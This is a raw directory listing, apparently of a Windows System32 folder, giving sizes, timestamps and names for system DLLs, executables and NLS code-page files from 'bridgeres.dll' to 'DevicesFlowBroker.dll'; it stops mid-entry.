+F 2560 09/15/2018 07:29:16 bridgeres.dll +F 20480 09/15/2018 07:29:16 bridgeunattend.exe +F 244736 09/15/2018 07:28:29 BrokerLib.dll +F 57344 09/15/2018 07:28:26 browcli.dll +F 282424 03/07/2020 00:53:31 browserbroker.dll +F 147968 09/15/2018 07:28:42 browserexport.exe +F 144896 09/15/2018 07:28:26 BrowserSettingSync.dll +F 47136 03/07/2020 00:53:31 browser_broker.exe +F 14848 09/15/2018 07:28:58 browseui.dll +F 556544 03/07/2020 00:53:43 BTAGService.dll +F 381952 03/07/2020 00:53:43 BthAvctpSvc.dll +F 351744 03/07/2020 00:53:43 BthAvrcp.dll +F 61952 09/15/2018 07:28:38 BthAvrcpAppSvc.dll +F 115712 09/15/2018 07:28:43 bthci.dll +F 33792 09/15/2018 07:29:14 BthMtpContextHandler.dll +F 31232 09/15/2018 07:28:42 bthpanapi.dll +F 185856 09/15/2018 07:28:42 BthpanContextHandler.dll +D 0 09/15/2018 07:34:00 Bthprops +F 261632 03/07/2020 00:53:51 bthprops.cpl +F 106496 09/15/2018 07:28:38 BthRadioMedia.dll +F 197120 03/07/2020 00:53:43 bthserv.dll +F 31232 09/15/2018 07:28:36 BthTelemetry.dll +F 40448 09/15/2018 07:28:42 bthudtask.exe +F 123904 09/15/2018 07:28:42 btpanui.dll +F 807424 09/15/2018 07:29:21 Bubbles.scr +F 67072 09/15/2018 07:29:16 BWContextHandler.dll +F 64000 09/15/2018 07:28:29 ByteCodeGenerator.exe +F 101888 09/15/2018 07:28:44 cabapi.dll +F 143088 09/15/2018 07:28:44 cabinet.dll +F 166912 09/15/2018 07:28:44 cabview.dll +F 33280 09/15/2018 07:29:23 cacls.exe +F 27648 09/15/2018 07:29:22 calc.exe +F 86016 09/15/2018 07:28:20 CallButtons.dll +F 28160 09/15/2018 07:28:20 CallButtons.ProxyStub.dll +F 178176 09/15/2018 07:28:36 CallHistoryClient.dll +F 128000 09/15/2018 07:28:30 CameraCaptureUI.dll +F 32200 09/15/2018 09:09:56 CameraSettingsUIHost.exe +F 35328 09/15/2018 07:28:30 canonurl.dll +F 64512 09/15/2018 07:28:30 CapabilityAccessHandlers.dll +F 292352 03/07/2020 00:53:38 CapabilityAccessManager.dll +F 109568 03/07/2020 00:53:38 CapabilityAccessManagerClient.dll +F 332144 09/15/2018 07:28:29 capauthz.dll +F 61952 09/15/2018 07:29:14 capiprovider.dll 
+F 25600 09/15/2018 07:28:50 capisp.dll +F 122880 09/15/2018 07:28:42 CaptureService.dll +F 148992 03/07/2020 00:54:09 CastingShellExt.dll +F 94208 09/15/2018 07:29:14 CastLaunch.dll +F 60968 09/15/2018 07:29:14 CastSrv.exe +D 0 09/15/2018 07:33:50 CatRoot +D 0 03/30/2020 07:41:16 catroot2 +F 463872 09/15/2018 07:28:43 catsrv.dll +F 50176 09/15/2018 07:28:42 catsrvps.dll +F 508928 09/15/2018 07:28:44 catsrvut.dll +F 961024 03/07/2020 00:54:11 CBDHSvc.dll +F 91136 09/15/2018 07:29:23 cca.dll +F 266240 09/15/2018 07:28:32 cdd.dll +F 1065984 09/15/2018 07:29:19 cdosys.dll +F 5301248 03/07/2020 00:53:38 cdp.dll +F 1794048 03/07/2020 00:53:38 cdprt.dll +F 650240 03/07/2020 00:53:38 cdpsvc.dll +F 515584 03/07/2020 00:53:38 cdpusersvc.dll +F 741376 09/15/2018 07:28:25 CellularAPI.dll +F 45056 09/15/2018 07:28:25 cellulardatacapabilityhandler.dll +F 249856 09/15/2018 07:28:36 cemapi.dll +F 34816 09/15/2018 07:28:22 cero.rs +F 800768 09/15/2018 07:28:30 certca.dll +F 463872 09/15/2018 07:28:30 certcli.dll +F 329216 09/15/2018 07:28:51 certCredProvider.dll +F 66560 09/15/2018 07:29:22 certenc.dll +F 3198976 03/07/2020 00:53:26 CertEnroll.dll +F 51712 09/15/2018 07:28:30 CertEnrollCtrl.exe +F 328704 09/15/2018 07:29:21 CertEnrollUI.dll +F 63081 09/15/2018 07:29:21 certlm.msc +F 2192896 09/15/2018 07:29:21 certmgr.dll +F 63070 09/15/2018 07:29:21 certmgr.msc +F 62464 09/15/2018 07:29:22 CertPKICmdlet.dll +F 121344 09/15/2018 07:28:42 CertPolEng.dll +F 192512 09/15/2018 07:28:59 certprop.dll +F 522752 09/15/2018 07:29:22 certreq.exe +F 1652736 09/15/2018 07:29:22 certutil.exe +F 267776 09/15/2018 09:10:05 cewmdm.dll +F 77824 09/15/2018 07:28:44 cfgbkend.dll +F 293344 09/15/2018 07:28:46 cfgmgr32.dll +F 145408 09/15/2018 07:29:16 CfgSPCellular.dll +F 140288 09/15/2018 07:28:24 CfgSPPolicy.dll +F 99328 09/15/2018 07:28:42 cflapi.dll +F 40248 09/15/2018 07:29:13 cfmifs.dll +F 14848 09/15/2018 07:29:13 cfmifsproxy.dll +F 7870976 03/07/2020 00:54:13 Chakra.dll +F 155136 03/07/2020 
00:54:13 Chakradiag.dll +F 139776 09/15/2018 07:29:18 Chakrathunk.dll +F 17408 09/15/2018 09:10:03 change.exe +F 102216 09/15/2018 07:28:44 changepk.exe +F 190976 09/15/2018 07:29:22 charmap.exe +F 129024 09/15/2018 07:28:44 chartv.dll +F 779776 09/15/2018 07:28:34 ChatApis.dll +F 14336 09/15/2018 07:29:16 chcp.com +F 28672 09/15/2018 07:29:19 CheckNetIsolation.exe +F 22016 09/15/2018 09:10:03 chglogon.exe +F 25088 09/15/2018 09:10:03 chgport.exe +F 22016 09/15/2018 09:10:03 chgusr.exe +F 25088 09/15/2018 07:28:43 chkdsk.exe +F 21504 09/15/2018 07:28:43 chkntfs.exe +F 26112 09/15/2018 07:28:56 chkwudrv.dll +F 33792 09/15/2018 07:29:16 choice.exe +F 455680 03/07/2020 00:53:31 ChsStrokeDS.dll +F 167640 09/15/2018 07:28:36 chs_singlechar_pinyin.dat +F 103424 09/15/2018 07:28:22 ChtAdvancedDS.dll +F 458240 03/07/2020 00:53:31 ChtBopomofoDS.dll +F 463872 03/07/2020 00:53:31 ChtCangjieDS.dll +F 456192 03/07/2020 00:53:31 ChtHkStrokeDS.dll +F 454144 03/07/2020 00:53:31 ChtQuickDS.dll +F 535552 03/07/2020 00:53:31 ChxAPDS.dll +F 376320 03/07/2020 00:53:31 ChxDecoder.dll +F 509440 03/07/2020 00:53:31 ChxHAPDS.dll +F 358912 03/07/2020 00:53:31 chxinputrouter.dll +F 120832 03/07/2020 00:53:31 chxranker.dll +F 13312 09/15/2018 07:28:44 CHxReadingStringIME.dll +F 856432 03/07/2020 00:53:26 ci.dll +F 200192 09/15/2018 07:29:20 cic.dll +F 30720 09/15/2018 07:29:13 CIDiag.exe +F 47104 09/15/2018 07:28:52 cipher.exe +F 11264 09/15/2018 07:28:15 CIRCoInst.dll +F 41472 09/15/2018 09:09:58 CIWmi.dll +F 18432 09/15/2018 07:29:21 clb.dll +F 644568 09/15/2018 07:28:43 clbcatq.dll +F 103936 09/15/2018 07:28:43 cldapi.dll +F 221184 09/15/2018 07:29:14 cleanmgr.exe +F 59392 09/15/2018 07:29:22 CleanPCCSP.dll +F 73728 03/07/2020 00:53:29 clfsw32.dll +F 87040 09/15/2018 07:29:20 cliconfg.dll +F 30720 09/15/2018 07:29:20 cliconfg.exe +F 37376 09/15/2018 07:29:20 cliconfg.rll +F 30720 09/15/2018 07:29:14 clip.exe +F 198656 09/15/2018 07:28:30 ClipboardServer.dll +F 155968 09/15/2018 07:28:29 
Clipc.dll +F 871792 03/07/2020 00:53:24 ClipSVC.dll +F 1247856 03/07/2020 00:54:11 ClipUp.exe +F 485376 03/07/2020 00:53:37 cloudAP.dll +F 115712 03/07/2020 00:53:43 CloudDomainJoinAUG.dll +F 348672 09/15/2018 07:28:36 CloudDomainJoinDataModelServer.dll +F 409912 03/07/2020 00:53:51 CloudExperienceHost.dll +F 274448 03/07/2020 00:53:51 CloudExperienceHostBroker.dll +F 65848 09/15/2018 07:28:40 CloudExperienceHostBroker.exe +F 938296 03/07/2020 00:53:38 CloudExperienceHostCommon.dll +F 258872 09/15/2018 07:28:30 CloudExperienceHostUser.dll +F 79032 03/07/2020 00:53:33 CloudNotifications.exe +F 193704 03/07/2020 00:53:33 CloudStorageWizard.exe +F 16384 09/15/2018 07:29:33 clrhost.dll +F 1051136 03/07/2020 00:54:08 clusapi.dll +F 37888 09/15/2018 07:28:57 cmcfg32.dll +F 278528 03/07/2020 00:53:43 cmd.exe +F 27136 09/15/2018 07:28:44 cmdext.dll +F 556032 09/15/2018 07:28:57 cmdial32.dll +F 19968 09/15/2018 07:28:58 cmdkey.exe +F 51712 09/15/2018 07:28:57 cmdl32.exe +F 71680 09/15/2018 07:28:50 cmgrcspps.dll +F 102200 09/15/2018 07:28:25 cmifw.dll +F 44544 03/07/2020 00:53:41 cmintegrator.dll +F 45568 09/15/2018 07:28:57 cmlua.dll +F 43008 09/15/2018 07:28:57 cmmon32.exe +F 29696 09/15/2018 07:28:57 cmpbk32.dll +F 93696 09/15/2018 07:28:57 cmstp.exe +F 20480 09/15/2018 07:28:57 cmstplua.dll +F 59392 09/15/2018 07:28:57 cmutil.dll +F 110592 09/15/2018 07:28:58 cngcredui.dll +F 65536 09/15/2018 07:29:14 cngprovider.dll +F 39424 09/15/2018 07:29:14 cnvfat.dll +F 30720 09/15/2018 07:28:22 cob-au.rs +D 0 09/15/2018 07:33:50 CodeIntegrity +F 24064 09/15/2018 07:29:23 cofire.exe +F 33280 09/15/2018 07:29:23 cofiredm.dll +F 80896 09/15/2018 07:28:43 colbact.dll +F 49152 09/15/2018 07:28:34 coloradapterclient.dll +F 203224 09/15/2018 09:10:01 COLORCNV.DLL +F 87552 09/15/2018 07:28:52 colorcpl.exe +F 622080 09/15/2018 07:28:52 colorui.dll +D 0 09/15/2018 09:07:52 com +F 3334496 03/07/2020 00:53:26 combase.dll +F 10240 09/15/2018 07:28:42 comcat.dll +F 674304 09/15/2018 07:28:57 
comctl32.dll +F 1169920 03/07/2020 00:53:46 comdlg32.dll +F 124118 09/15/2018 07:28:42 comexp.msc +F 468792 03/07/2020 00:53:40 coml2.dll +F 25088 09/15/2018 07:29:13 comp.exe +F 46080 03/07/2020 00:53:52 compact.exe +F 164368 03/07/2020 00:53:51 CompatTelRunner.exe +F 113256 09/15/2018 07:29:16 compmgmt.msc +F 91136 03/07/2020 00:54:11 CompMgmtLauncher.exe +F 315904 03/07/2020 00:53:53 ComposableShellProxyStub.dll +F 264704 03/07/2020 00:53:53 ComposerFramework.dll +F 165376 03/07/2020 00:53:31 CompPkgSrv.exe +F 114648 03/07/2020 00:53:31 CompPkgSup.dll +F 310272 09/15/2018 07:28:57 compstui.dll +F 662024 03/07/2020 00:53:22 computecore.dll +F 15888 09/15/2018 07:29:16 computelibeventlog.dll +F 74752 09/15/2018 07:29:16 computenetwork.dll +F 78336 03/07/2020 00:54:11 ComputerDefaults.exe +F 686 09/15/2018 07:28:22 ComputerToastIcon.contrast-white.png +F 387 09/15/2018 07:28:22 ComputerToastIcon.png +F 310072 03/07/2020 00:53:22 computestorage.dll +F 133632 09/15/2018 07:28:42 comrepl.dll +F 1295360 09/15/2018 07:28:42 comres.dll +F 289280 09/15/2018 07:28:42 comsnap.dll +F 1684480 09/15/2018 07:28:44 comsvcs.dll +F 805888 09/15/2018 07:28:43 comuid.dll +F 332456 02/16/2017 16:45:12 concrt140.dll +D 0 03/29/2020 10:20:55 config +F 673280 03/07/2020 00:53:58 configmanager2.dll +D 0 03/30/2020 08:45:35 Configuration +F 63488 09/15/2018 07:28:57 ConfigureExpandedStorage.dll +F 822272 03/07/2020 00:53:26 conhost.exe +F 315904 03/07/2020 00:53:51 ConhostV1.dll +F 1357312 09/15/2018 07:28:56 connect.dll +F 61952 09/15/2018 07:28:50 ConnectedAccountState.dll +F 159272 03/07/2020 00:53:43 consent.exe +F 132096 09/15/2018 07:29:14 ConsentExperienceCommon.dll +F 105784 03/07/2020 00:53:58 ConsentUX.dll +F 157696 09/15/2018 07:29:14 ConsentUxClient.dll +F 127488 09/15/2018 07:28:44 console.dll +F 344576 03/07/2020 00:53:57 ConsoleLogon.dll +F 1753088 03/07/2020 00:53:50 ConstraintIndex.Search.dll +F 56320 09/15/2018 07:28:36 ContactActivation.dll +F 1005056 09/15/2018 
07:28:34 ContactApis.dll +F 215552 03/07/2020 00:54:15 ContactHarvesterDS.dll +F 217600 03/07/2020 00:53:26 container.dll +F 1701384 03/07/2020 00:53:31 ContentDeliveryManager.Utilities.dll +F 117760 09/15/2018 07:28:24 control.exe +F 21504 09/15/2018 07:29:14 convert.exe +F 225592 09/15/2018 07:28:39 convertvhd.exe +F 14848 09/15/2018 07:28:20 coreaudiopolicymanagerext.dll +F 281600 03/07/2020 00:53:58 coredpus.dll +F 73728 03/07/2020 00:53:58 coredpussvr.exe +F 918304 03/07/2020 00:53:21 CoreMessaging.dll +F 19968 09/15/2018 09:10:01 CoreMmRes.dll +F 1729024 03/07/2020 00:53:53 CoreShell.dll +F 451584 03/07/2020 00:53:53 CoreShellAPI.dll +F 101888 03/07/2020 00:53:53 CoreShellExtFramework.dll +F 3292352 09/15/2018 07:28:32 CoreUIComponents.dll +F 86528 09/15/2018 07:29:23 correngine.dll +F 281600 03/07/2020 00:53:45 Cortana.Persona.dll +F 246784 09/15/2018 07:28:57 CortanaMapiHelper.dll +F 17408 09/15/2018 07:28:57 CortanaMapiHelper.ProxyStub.dll +F 201728 09/15/2018 07:28:24 CourtesyEngine.dll +F 883200 03/07/2020 00:54:17 CPFilters.dll +F 129536 03/07/2020 00:53:51 CredDialogBroker.dll +F 54784 03/07/2020 00:53:33 CredentialMigrationHandler.dll +F 139648 03/07/2020 00:53:57 CredentialUIBroker.exe +F 109056 09/15/2018 07:28:51 CredProv2faHelper.dll +F 611840 03/07/2020 00:53:23 CredProvDataModel.dll +F 88064 03/07/2020 00:53:57 CredProvHelper.dll +F 340480 03/07/2020 00:53:57 credprovhost.dll +F 334336 03/07/2020 00:53:57 credprovs.dll +F 193024 09/15/2018 07:28:50 credprovslegacy.dll +F 23552 09/15/2018 07:28:59 credssp.dll +F 49152 03/07/2020 00:53:57 credui.dll +F 37888 09/15/2018 07:29:22 credwiz.exe +F 1936520 03/07/2020 00:53:26 crypt32.dll +F 33832 09/15/2018 07:28:45 cryptbase.dll +F 124416 03/07/2020 00:53:57 cryptcatsvc.dll +F 31232 09/15/2018 07:29:19 cryptdlg.dll +F 66688 03/07/2020 00:53:26 cryptdll.dll +F 71680 09/15/2018 07:28:50 cryptext.dll +F 169984 09/15/2018 07:28:45 cryptnet.dll +F 435712 03/07/2020 00:53:42 cryptngc.dll +F 375296 09/15/2018 
07:28:30 CryptoWinRT.dll +F 80112 09/15/2018 07:28:46 cryptsp.dll +F 95232 09/15/2018 07:28:46 cryptsvc.dll +F 62976 09/15/2018 07:28:30 crypttpmeksvc.dll +F 596992 03/07/2020 00:53:57 cryptui.dll +F 383488 09/15/2018 07:29:21 cryptuiwizard.dll +F 126568 09/15/2018 07:28:34 cryptxml.dll +D 0 09/15/2018 09:09:27 cs-CZ +F 49664 03/07/2020 00:53:45 cscapi.dll +F 30208 03/07/2020 00:53:45 cscdll.dll +F 145424 09/15/2018 09:09:56 CscMig.dll +F 295424 03/07/2020 00:54:24 cscobj.dll +F 162816 09/15/2018 07:28:57 cscript.exe +F 740352 03/07/2020 00:54:24 cscsvc.dll +F 808960 03/07/2020 00:54:24 cscui.dll +F 57856 09/15/2018 07:29:16 CspCellularSettings.dll +F 165888 09/15/2018 07:29:16 csplte.dll +F 61952 09/15/2018 07:28:24 CspProxy.dll +F 43520 09/15/2018 07:28:22 csrr.rs +F 62976 09/15/2018 07:28:46 csrsrv.dll +F 17792 09/15/2018 07:28:45 csrss.exe +F 24064 09/15/2018 07:28:29 CSystemEventsBrokerClient.dll +F 10752 09/15/2018 07:28:45 ctfmon.exe +F 326144 09/15/2018 07:29:14 cttune.exe +F 41984 09/15/2018 07:29:14 cttunesvr.exe +F 421376 03/07/2020 00:53:29 curl.exe +F 108544 09/15/2018 07:28:42 cxcredprov.dll +F 291328 03/07/2020 00:54:18 CXHProvisioningServer.dll +F 66082 09/15/2018 07:29:18 C_037.NLS +F 66082 09/15/2018 07:29:18 C_10000.NLS +F 162850 09/15/2018 07:29:18 C_10001.NLS +F 195618 09/15/2018 07:29:18 C_10002.NLS +F 177698 09/15/2018 07:29:18 C_10003.NLS +F 66082 09/15/2018 07:29:18 C_10004.NLS +F 66082 09/15/2018 07:29:18 C_10005.NLS +F 66082 09/15/2018 07:29:18 C_10006.NLS +F 66082 09/15/2018 07:29:18 C_10007.NLS +F 173602 09/15/2018 07:29:18 C_10008.NLS +F 66082 09/15/2018 07:29:18 C_10010.NLS +F 66082 09/15/2018 07:29:18 C_10017.NLS +F 66082 09/15/2018 07:29:18 C_10021.NLS +F 66082 09/15/2018 07:29:18 C_10029.NLS +F 66082 09/15/2018 07:29:18 C_10079.NLS +F 66082 09/15/2018 07:29:18 C_10081.NLS +F 66082 09/15/2018 07:29:18 C_10082.NLS +F 66082 09/15/2018 07:29:18 C_1026.NLS +F 66082 09/15/2018 07:29:18 C_1047.NLS +F 66082 09/15/2018 07:29:18 C_1140.NLS 
+F 66082 09/15/2018 07:29:18 C_1141.NLS +F 66082 09/15/2018 07:29:18 C_1142.NLS +F 66082 09/15/2018 07:29:18 C_1143.NLS +F 66082 09/15/2018 07:29:18 C_1144.NLS +F 66082 09/15/2018 07:29:18 C_1145.NLS +F 66082 09/15/2018 07:29:18 C_1146.NLS +F 66082 09/15/2018 07:29:18 C_1147.NLS +F 66082 09/15/2018 07:29:18 C_1148.NLS +F 66082 09/15/2018 07:29:18 C_1149.NLS +F 66082 09/15/2018 07:28:46 C_1250.NLS +F 66082 09/15/2018 07:28:46 C_1251.NLS +F 66082 09/15/2018 07:28:46 C_1252.NLS +F 66082 09/15/2018 07:28:46 C_1253.NLS +F 66082 09/15/2018 07:28:46 C_1254.NLS +F 66082 09/15/2018 07:28:46 C_1255.NLS +F 66082 09/15/2018 07:28:46 C_1256.NLS +F 66082 09/15/2018 07:28:46 C_1257.NLS +F 66082 09/15/2018 07:28:46 C_1258.NLS +F 189986 09/15/2018 07:28:46 C_1361.NLS +F 180258 09/15/2018 07:28:46 C_20000.NLS +F 186402 09/15/2018 07:28:46 C_20001.NLS +F 173602 09/15/2018 07:28:46 C_20002.NLS +F 185378 09/15/2018 07:28:46 C_20003.NLS +F 180258 09/15/2018 07:28:46 C_20004.NLS +F 187938 09/15/2018 07:28:46 C_20005.NLS +F 66082 09/15/2018 07:29:18 C_20105.NLS +F 66082 09/15/2018 07:29:18 C_20106.NLS +F 66082 09/15/2018 07:29:18 C_20107.NLS +F 66082 09/15/2018 07:29:18 C_20108.NLS +F 66082 09/15/2018 07:28:46 C_20127.NLS +F 139810 09/15/2018 07:28:46 C_20261.NLS +F 66082 09/15/2018 07:29:18 C_20269.NLS +F 66082 09/15/2018 07:29:18 C_20273.NLS +F 66082 09/15/2018 07:29:18 C_20277.NLS +F 66082 09/15/2018 07:29:18 C_20278.NLS +F 66082 09/15/2018 07:29:18 C_20280.NLS +F 66082 09/15/2018 07:29:18 C_20284.NLS +F 66082 09/15/2018 07:29:18 C_20285.NLS +F 66082 09/15/2018 07:29:18 C_20290.NLS +F 66082 09/15/2018 07:29:18 C_20297.NLS +F 66082 09/15/2018 07:29:18 C_20420.NLS +F 66082 09/15/2018 07:29:18 C_20423.NLS +F 66082 09/15/2018 07:29:18 C_20424.NLS +F 66082 09/15/2018 07:29:18 C_20833.NLS +F 66082 09/15/2018 07:29:18 C_20838.NLS +F 66082 09/15/2018 07:28:46 C_20866.NLS +F 66082 09/15/2018 07:29:18 C_20871.NLS +F 66082 09/15/2018 07:29:18 C_20880.NLS +F 66082 09/15/2018 07:29:18 C_20905.NLS 
+F 66082 09/15/2018 07:29:18 C_20924.NLS +F 180770 09/15/2018 07:28:46 C_20932.NLS +F 173602 09/15/2018 07:28:46 C_20936.NLS +F 177698 09/15/2018 07:28:46 C_20949.NLS +F 66082 09/15/2018 07:29:18 C_21025.NLS +F 66082 09/15/2018 07:29:18 C_21027.NLS +F 66082 09/15/2018 07:28:46 C_21866.NLS +F 66082 09/15/2018 07:28:46 C_28591.NLS +F 66082 09/15/2018 07:28:46 C_28592.NLS +F 66082 09/15/2018 07:28:46 C_28593.NLS +F 66082 09/15/2018 07:28:46 C_28594.NLS +F 66082 09/15/2018 07:28:46 C_28595.NLS +F 66082 09/15/2018 07:28:46 C_28596.NLS +F 66082 09/15/2018 07:28:46 C_28597.NLS +F 66082 09/15/2018 07:28:46 C_28598.NLS +F 66082 09/15/2018 07:28:46 C_28599.NLS +F 66082 09/15/2018 07:28:46 c_28603.nls +F 66082 09/15/2018 07:28:46 C_28605.NLS +F 66594 09/15/2018 07:28:46 C_437.NLS +F 66082 09/15/2018 07:29:18 C_500.NLS +F 66082 09/15/2018 07:28:46 C_708.NLS +F 66594 09/15/2018 07:28:46 C_720.NLS +F 66594 09/15/2018 07:28:46 C_737.NLS +F 66594 09/15/2018 07:28:46 C_775.NLS +F 66594 09/15/2018 07:28:46 C_850.NLS +F 66594 09/15/2018 07:28:46 C_852.NLS +F 66594 09/15/2018 07:28:46 C_855.NLS +F 66594 09/15/2018 07:28:46 C_857.NLS +F 66594 09/15/2018 07:28:46 C_858.NLS +F 66594 09/15/2018 07:28:46 C_860.NLS +F 66594 09/15/2018 07:28:46 C_861.NLS +F 66594 09/15/2018 07:28:46 C_862.NLS +F 66594 09/15/2018 07:28:46 C_863.NLS +F 66594 09/15/2018 07:28:46 C_864.NLS +F 66594 09/15/2018 07:28:46 C_865.NLS +F 66594 09/15/2018 07:28:46 C_866.NLS +F 66594 09/15/2018 07:28:46 C_869.NLS +F 66082 09/15/2018 07:29:18 C_870.NLS +F 66594 09/15/2018 07:28:46 C_874.NLS +F 66082 09/15/2018 07:29:18 C_875.NLS +F 162850 09/15/2018 07:28:46 C_932.NLS +F 196642 09/15/2018 07:28:46 C_936.NLS +F 196642 09/15/2018 07:28:46 C_949.NLS +F 196642 09/15/2018 07:28:46 C_950.NLS +F 227840 09/15/2018 07:28:46 C_G18030.DLL +F 14848 09/15/2018 07:28:46 c_GSM7.DLL +F 17408 09/15/2018 07:28:46 C_IS2022.DLL +F 14336 09/15/2018 07:29:18 C_ISCII.DLL +F 6058032 03/07/2020 00:53:39 d2d1.dll +F 1219584 09/15/2018 07:28:50 
d3d10.dll +F 36352 09/15/2018 07:28:50 d3d10core.dll +F 386456 09/15/2018 07:28:34 d3d10level9.dll +F 7556600 03/07/2020 00:53:39 d3d10warp.dll +F 179712 09/15/2018 07:28:50 d3d10_1.dll +F 37376 09/15/2018 07:28:50 d3d10_1core.dll +F 2611136 03/07/2020 00:53:39 d3d11.dll +F 622336 03/07/2020 00:53:39 d3d11on12.dll +F 1844456 03/07/2020 00:53:39 D3D12.dll +F 13824 09/15/2018 07:28:51 d3d8thk.dll +F 1678800 03/07/2020 00:53:57 d3d9.dll +F 826880 03/07/2020 00:53:39 d3d9on12.dll +F 4477440 09/15/2018 07:28:32 D3DCompiler_47.dll +F 148992 03/07/2020 00:53:39 D3DSCache.dll +D 0 09/15/2018 09:09:27 da-DK +F 109568 03/07/2020 00:53:53 dab.dll +F 14336 09/15/2018 07:28:46 dabapi.dll +F 55296 09/15/2018 07:28:50 DAConn.dll +F 136704 09/15/2018 07:28:26 dafAspInfraProvider.dll +F 274432 09/15/2018 07:28:38 dafBth.dll +F 47104 09/15/2018 07:28:34 DafDnsSd.dll +F 129024 09/15/2018 07:28:50 dafDockingProvider.dll +F 70656 09/15/2018 07:28:22 DafGip.dll +F 193024 09/15/2018 07:28:30 DAFIoT.dll +F 301568 03/07/2020 00:54:16 DAFIPP.dll +F 295424 09/15/2018 07:28:36 dafpos.dll +F 119808 09/15/2018 07:28:57 DafPrintProvider.dll +F 184832 09/15/2018 07:29:13 dafupnp.dll +F 114688 09/15/2018 07:28:24 dafWCN.dll +F 362496 03/07/2020 00:53:33 dafWfdProvider.dll +F 119808 09/15/2018 07:29:13 DAFWiProv.dll +F 313344 03/07/2020 00:53:42 DAFWSD.dll +F 132096 09/15/2018 07:28:38 DAMediaManager.dll +F 124928 09/15/2018 07:28:50 DAMM.dll +F 322560 09/15/2018 07:28:56 DaOtpCredentialProvider.dll +F 475136 09/15/2018 07:28:36 das.dll +F 95744 09/15/2018 07:28:36 dasHost.exe +F 46592 03/07/2020 00:54:11 dataclen.dll +F 335872 03/07/2020 00:53:39 DataExchange.dll +F 243216 03/07/2020 00:54:11 DataExchangeHost.exe +F 114176 09/15/2018 07:29:13 datamarketsvc.dll +F 148480 03/07/2020 00:53:35 DataStoreCacheDumpTool.exe +F 361984 03/07/2020 00:54:08 DataUsageHandlers.dll +F 134144 03/07/2020 00:54:08 DataUsageLiveTileTask.exe +F 34304 09/15/2018 07:28:56 datusage.dll +F 95232 09/15/2018 07:29:25 
davclnt.dll +F 27648 09/15/2018 07:28:57 davhlpr.dll +F 415744 03/07/2020 00:54:28 DavSyncProvider.dll +F 616448 03/07/2020 00:53:43 daxexec.dll +F 155648 09/15/2018 07:28:46 dbgcore.dll +F 6132736 03/07/2020 00:53:29 dbgeng.dll +F 1903616 09/15/2018 07:28:46 dbghelp.dll +F 671744 09/15/2018 07:28:45 DbgModel.dll +F 117248 09/15/2018 07:29:20 dbnetlib.dll +F 24064 09/15/2018 07:29:20 dbnmpntw.dll +F 659456 09/15/2018 07:28:51 dccw.exe +F 14336 09/15/2018 07:28:47 dciman32.dll +F 514600 03/07/2020 00:53:26 dcntel.dll +F 11776 09/15/2018 07:28:42 dcomcnfg.exe +F 1837136 03/07/2020 00:53:53 dcomp.dll +F 29712 09/15/2018 07:29:16 DDACLSys.dll +F 54272 09/15/2018 07:28:22 DdcAntiTheftApi.dll +F 25600 09/15/2018 07:28:22 DdcClaimsApi.dll +F 54272 09/15/2018 07:28:24 DdcComImplementationsDesktop.dll +F 495616 03/07/2020 00:53:28 DDDS.dll +D 0 09/15/2018 07:34:00 DDFs +F 211456 03/07/2020 00:53:39 ddisplay.dll +F 38400 09/15/2018 07:28:51 ddodiag.exe +F 31744 09/15/2018 07:28:50 DDOIProxy.dll +F 15650664 09/15/2018 07:28:50 DDORes.dll +F 228352 03/07/2020 00:54:22 ddpchunk.dll +F 136704 09/15/2018 09:10:02 ddptrace.dll +F 285696 09/15/2018 09:10:02 ddputils.dll +F 66560 09/15/2018 09:10:02 ddp_ps.dll +F 583680 09/15/2018 07:28:50 ddraw.dll +F 48128 09/15/2018 07:28:50 ddrawex.dll +D 0 03/07/2020 00:55:54 de-DE +F 366 09/15/2018 07:28:30 DefaultAccountTile.png +F 21376 09/15/2018 07:28:50 DefaultDeviceManager.dll +F 4227116 09/15/2018 07:28:22 DefaultHrtfs.bin +F 26624 09/15/2018 07:28:50 DefaultPrinterProvider.dll +F 858 09/15/2018 07:31:36 DefaultQuestions.json +F 186880 03/07/2020 00:54:09 Defrag.exe +F 19968 09/15/2018 07:29:14 defragproxy.dll +F 4096 09/15/2018 07:29:14 defragres.dll +F 492032 03/07/2020 00:54:09 defragsvc.dll +F 26624 09/15/2018 07:29:14 delegatorprovider.dll +F 168960 09/15/2018 07:29:23 desk.cpl +F 50688 09/15/2018 07:29:16 deskadp.dll +F 49152 09/15/2018 07:29:24 deskmon.dll +F 77312 03/07/2020 00:53:48 desktopimgdownldr.exe +F 278879 09/15/2018 
07:28:39 DesktopKeepOnToastImg.gif +F 45568 09/15/2018 07:28:39 DesktopShellAppStateContract.dll +F 105472 03/07/2020 00:53:43 DesktopShellExt.dll +F 262656 03/07/2020 00:53:48 DesktopSwitcherDataModel.dll +F 3944 09/15/2018 07:28:44 DetailedReading-Default.xml +F 119328 09/15/2018 07:28:30 DevDispItemProvider.dll +F 305664 09/15/2018 07:28:56 DeveloperOptionsSettingsHandlers.dll +F 91392 09/15/2018 07:29:22 devenum.dll +F 217904 03/07/2020 00:53:39 deviceaccess.dll +F 58368 09/15/2018 07:28:36 deviceassociation.dll +F 36368 03/07/2020 00:53:26 DeviceCensus.exe +F 441344 03/07/2020 00:54:11 DeviceCenter.dll +F 67072 09/15/2018 07:28:34 DeviceCredential.dll +F 80896 09/15/2018 07:28:38 DeviceCredentialDeployment.exe +F 305664 03/07/2020 00:53:32 DeviceDirectoryClient.dll +F 34816 09/15/2018 07:28:50 DeviceDisplayStatusManager.dll +F 46080 09/15/2018 07:28:51 DeviceDriverRetrievalClient.dll +F 30208 09/15/2018 07:28:56 DeviceEject.exe +F 128000 09/15/2018 07:29:14 DeviceElementSource.dll +F 360960 03/07/2020 00:53:58 DeviceEnroller.exe +F 1961984 03/07/2020 00:53:50 DeviceFlows.DataModel.dll +F 138752 03/07/2020 00:53:57 DeviceMetadataRetrievalClient.dll +F 209920 09/15/2018 07:28:50 devicengccredprov.dll +F 571904 09/15/2018 07:29:14 DevicePairing.dll +F 105984 09/15/2018 07:28:41 DevicePairingExperienceMEM.dll +F 215040 09/15/2018 07:29:14 DevicePairingFolder.dll +F 29184 09/15/2018 07:29:14 DevicePairingProxy.dll +F 94208 09/15/2018 07:29:14 DevicePairingWizard.exe +F 94720 09/15/2018 07:29:14 DeviceProperties.exe +F 88576 09/15/2018 07:28:45 DeviceReactivation.dll +F 228352 09/15/2018 07:28:23 deviceregistration.dll +F 241664 03/07/2020 00:53:37 DeviceSetupManager.dll +F 157696 09/15/2018 07:28:50 DeviceSetupManagerAPI.dll +F 35328 09/15/2018 07:28:50 DeviceSetupStatusProvider.dll +F 745472 03/07/2020 00:53:50 DevicesFlowBroker.dll +F 152576 03/07/2020 00:53:57 